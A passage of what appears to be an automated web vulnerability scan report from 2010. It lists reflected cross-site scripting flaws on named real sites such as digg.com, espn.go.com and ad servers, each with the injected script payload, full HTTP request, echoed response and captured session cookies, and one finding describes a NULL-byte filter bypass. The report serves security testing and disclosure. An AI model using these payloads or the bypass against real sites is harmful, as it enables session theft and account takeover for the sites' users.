The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://altfarm.mediaplex.com/ad/fm/12760-79049-1577-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12760-79049-1577-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64aee"><script>alert(1)</script>573b308cfb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12760-79049-1577-0?64aee"><script>alert(1)</script>573b308cfb8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: svid=OPT-OUT;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 302
Date: Sun, 07 Nov 2010 01:11:40 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/12760-79049-1577-0?64aee"><script>alert(1)</script>573b308cfb8=1"><img ismap border
...[SNIP]...

5.2. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e172c"><script>alert(1)</script>f7756b7702 was submitted in the REST URL parameter 1. This input was echoed as e172c"><script>alert(1)</script>f7756b7702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e172c"><script>alert(1)</script>f7756b7702 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=4539346949412749377%3A134; expires=Tue, 07-Dec-2010 00:54:14 GMT; path=/; domain=digg.com
Set-Cookie: d=62fef449c4bf8c0604fe243f5ea25df9a0bc000c1e0cf9588ea4f6059f216eb7; expires=Fri, 06-Nov-2020 11:01:54 GMT; path=/; domain=.digg.com
X-Digg-Time: D=195675 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15205

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e172c"><script>alert(1)</script>f7756b7702.rss">
...[SNIP]...

5.3. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/146837268@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbfb"><script>alert(1)</script>c9ded0707d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMebbfb"><script>alert(1)</script>c9ded0707d9/2010DM/146837268@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMebbfb"><script>alert(1)</script>c9ded0707d9/2010DM/1731003059/x23/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><
...[SNIP]...

5.4. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/146837268@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f69"><script>alert(1)</script>08006aab004 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM22f69"><script>alert(1)</script>08006aab004/146837268@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM22f69"><script>alert(1)</script>08006aab004/1753197212/x23/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><
...[SNIP]...

5.5. http://dm.de.mookie1.com/2/B3DM/2010DM/146837268@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/146837268@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c0f"><script>alert(1)</script>7c6a11bd058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/146837268@x23f5c0f"><script>alert(1)</script>7c6a11bd058 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/424855798/x23f5c0f"><script>alert(1)</script>7c6a11bd058/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><I
...[SNIP]...

5.6. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11053880328@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de299"><script>alert(1)</script>d4f414c1327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMde299"><script>alert(1)</script>d4f414c1327/DLX/11053880328@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMde299"><script>alert(1)</script>d4f414c1327/DLX/1898187550/x95/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.7. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11053880328@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fab"><script>alert(1)</script>3cd711156ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXb2fab"><script>alert(1)</script>3cd711156ce/11053880328@x95 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXb2fab"><script>alert(1)</script>3cd711156ce/688001852/x95/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.8. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11053880328@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39251"><script>alert(1)</script>ce638938be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11053880328@x9539251"><script>alert(1)</script>ce638938be HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1341161511/x9539251"><script>alert(1)</script>ce638938be/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.9. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11053880328@x95

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da14'-alert(1)-'9c9e315e2c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/DLX/11053880328@x95?6da14'-alert(1)-'9c9e315e2c5=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3463
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var dlx_segment_list = '6da14'-alert(1)-'9c9e315e2c5=1';

var dlx_segment_list_pairs=dlx_segment_list.split('|');
var ZAP_url='http://t.mookie1.com/t/v1/event?migClientId=1214&migAction=';

var ZT_string='';

var dlx_segment='';

//build string
...[SNIP]...

5.10. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11611717638@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb57"><script>alert(1)</script>a664fc42d16 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMedb57"><script>alert(1)</script>a664fc42d16/DLX/11611717638@x92 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMedb57"><script>alert(1)</script>a664fc42d16/DLX/2018841223/x92/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.11. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11611717638@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea58c"><script>alert(1)</script>27fa3aa330d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXea58c"><script>alert(1)</script>27fa3aa330d/11611717638@x92 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXea58c"><script>alert(1)</script>27fa3aa330d/818794092/x92/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.12. http://dm.de.mookie1.com/2/B3DM/DLX/11611717638@x92 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11611717638@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 345ae"><script>alert(1)</script>0b9ea008699 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/11611717638@x92345ae"><script>alert(1)</script>0b9ea008699 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:54:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1266156694/x92345ae"><script>alert(1)</script>0b9ea008699/default/empty.gif/726e6e65456b7a49667a6341416b2f41?x" target="_top"><IMG
...[SNIP]...

5.13. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [adminOver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /broadband/mpf/players/genericIndexPlayerPage

Issue detail

The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /broadband/mpf/players/genericIndexPlayerPage?id=2731137&player=SocNet_index&width=230&adminOver=soccerneta0933"%3balert(1)//f1709e21753&height=460&autostart=true HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://soccernet.espn.go.com/?cc=5901
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; AcceptCookies=yes; COREG=5901

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 14:21:59 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN14
Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 1371

<html>
<head>
</head>
<body MARGINWIDTH="0" MARGINHEIGHT="0" LEFTMARGIN="0" TOPMARGIN="0" bgcolor="#000000">

<script language="javascript" type="text/javascript" src="http://assets.espn.go.com/ivp/pl
...[SNIP]...
dVariable("player", "SocNet_index");
   so.addVariable("height", "460");
   so.addVariable("width", "230");
   so.addVariable("page", "");
   so.addVariable("host", "");
   so.addVariable("adminOver", "soccerneta0933";alert(1)//f1709e21753");
   
   so.write("player");
</script>
...[SNIP]...

5.14. http://espn.go.com/broadband/mpf/players/genericIndexPlayerPage [autostart parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /broadband/mpf/players/genericIndexPlayerPage

Issue detail

The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /broadband/mpf/players/genericIndexPlayerPage?id=2731137&player=SocNet_index&width=230&adminOver=soccernet&height=460&autostart=true59854"%3balert(1)//cc78248a523 HTTP/1.1
Host: espn.go.com
Proxy-Connection: keep-alive
Referer: http://soccernet.espn.go.com/?cc=5901
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; AcceptCookies=yes; COREG=5901

Response

